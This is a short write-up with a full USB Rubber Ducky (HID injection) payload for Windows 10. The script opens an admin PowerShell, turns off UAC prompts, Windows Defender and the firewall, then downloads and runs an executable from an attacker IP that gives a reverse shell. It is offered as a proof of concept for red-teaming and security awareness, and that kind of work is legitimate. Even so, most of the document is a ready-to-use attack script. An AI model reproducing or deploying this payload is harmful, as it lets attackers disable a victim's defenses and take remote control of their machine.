In the name of Allah, the Most Gracious, the Most Merciful.
Description: A simple Rubber Duck Payload to disabling Windows UAC, Windows Firewall, and Windows Defender.
This PoC show how to Automate Turn Off the Windows UAC, Windows Firewall, and Windows Defender at Windows 10 and also connect to Attacker Machine via Reverse Shell within (or less than) 10 seconds with USB HID Attack.
In this payload, we also add a function to download a file from server and executing it automatically. As a note, at the PoC Video, the file was a reverse shell that will be connect into the Attacker machine when executed at the victim OS.
Generally, this script also could help to conduct the Security Awareness at the end-user or conduct one of the red-team scenario.
The payload are not the original one since we combine one payload with another payload.
Please kindly note, this payload was executed within 10 seconds. Logically, it could be modify to less than 10 seconds since we put the delay around 1000 – 1500 ms.
REM Automate Turn-Off - Windows UAC, Windows Firewall, and Windows Defender REM Also automate to Download the malware and connect with Reverse Shell GUI r DELAY 1000 REM Open the Powershell as Administrator STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1500 ALT y ENTER DELAY 1000 REM Disabling the UAC STRING Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 ENTER DELAY 1000 REM Disabling the Firewall Part 1 STRING Set-MpPreference -DisableRealtimeMonitoring $true ENTER DELAY 1000 REM Disabling the Firewall Part 2 STRING Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False ENTER DELAY 1000 REM Disabling the Virus and Threat Protection STRING New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force ENTER DELAY 1000 REM Moving into C Directory STRING cd C:\ ENTER REM Download the Prepared Malware STRING $WC = New-Object System.Net.WebClient ENTER STRING $WC.DownloadFile("http://192.168.13.129/exploit.exe","C:\exploit.exe") ENTER DELAY 500 REM Execute the Downloaded Malware STRING .\exploit.exe ENTER DELAY 1000 ENTER STRING exit ENTER
- It can be setup in less than 10 second (depends to the DELAY time at the script).
- This script was uploaded into one of Arduino Board Series.